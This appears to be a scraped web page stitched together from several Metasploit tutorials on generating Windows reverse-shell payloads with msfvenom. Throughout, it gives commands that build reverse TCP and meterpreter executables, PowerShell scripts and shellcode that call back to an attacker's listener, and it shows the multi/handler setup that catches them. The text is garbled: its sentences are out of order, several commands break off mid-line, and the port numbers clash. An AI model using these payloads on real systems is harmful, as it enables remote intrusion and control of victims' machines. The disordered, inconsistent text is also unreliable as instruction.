If you don’t specify exe-service, the generated payload won’t be able to give you a persistent shell. In this tutorial we are going to take a look at how to create a reverse TCP payload in the Kali Linux operating system. This must be caught with Metasploit. When using msfvenom, you first select the payload you wish to send. It does not work with netcat. Executable - Its own executable shell with an extension such as .elf, .exe, .py, .php, etc.

We first use the multi/handler module, and then we set our payload to be a Windows reverse shell so that it matches the behavior of the executable we created earlier with msfvenom, tell it the LHOST and the LPORT to listen on, and we’re ready to go. We can generate the shell code by running the following command. exe Now, to dump configuration information or shell.exe file files with certutil.

msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe
use exploit/multi/handler
set payload windows/shell_reverse…

(There are multiple shell codes or payloads available which could be used according to the requirements.)

msfvenom -p windows/shell_bind_tcp -f c -a x86

Binaries

Msfvenom is capable of creating a wide variety of payloads across multiple languages, systems and architectures.

msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse_tcp.exe

Here, we are using a TCP reverse connection shell code that will open port 4444 on the server. So you need to type a series of options as shown below:

use exploit/multi/handler

E.g.: You have an unstable, non-interactive, low-privilege shell and you want to get something more stable and efficient on a vulnerable Windows machine.

set payload windows/shell_reverse_tcp

When Windows makes a call to start a service, it calls the ServiceMain function and expects a return from this call. (You can see a full list of payloads using the --list option.)
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e generic/none

Windows Reverse TCP Shell (Shellcode x86)

Only use this one if payload size is no problem and you can't determine the bad chars:

You’d generate the payload as an .exe, create a listener, upload and execute. A 32-bit payload is generated with this command “msfvenom.bat --payload windows/meterpreter_reverse_http --format psh --out meterpreter-32.ps1 LHOST=127.0.0.1”: Just as I showed in my post for .exe payloads, we start a handler like this: Now we need to execute the PowerShell scripts. You can follow the syntax below:

use exploit/multi/handler

MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode. The MSFVenom environment provides a lot of options in just a single terminal window.

msfvenom -p windows/shell_reverse_tcp LPORT=31337 LHOST=YOURIPHERE -f exe-service > shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.

Staged payload i.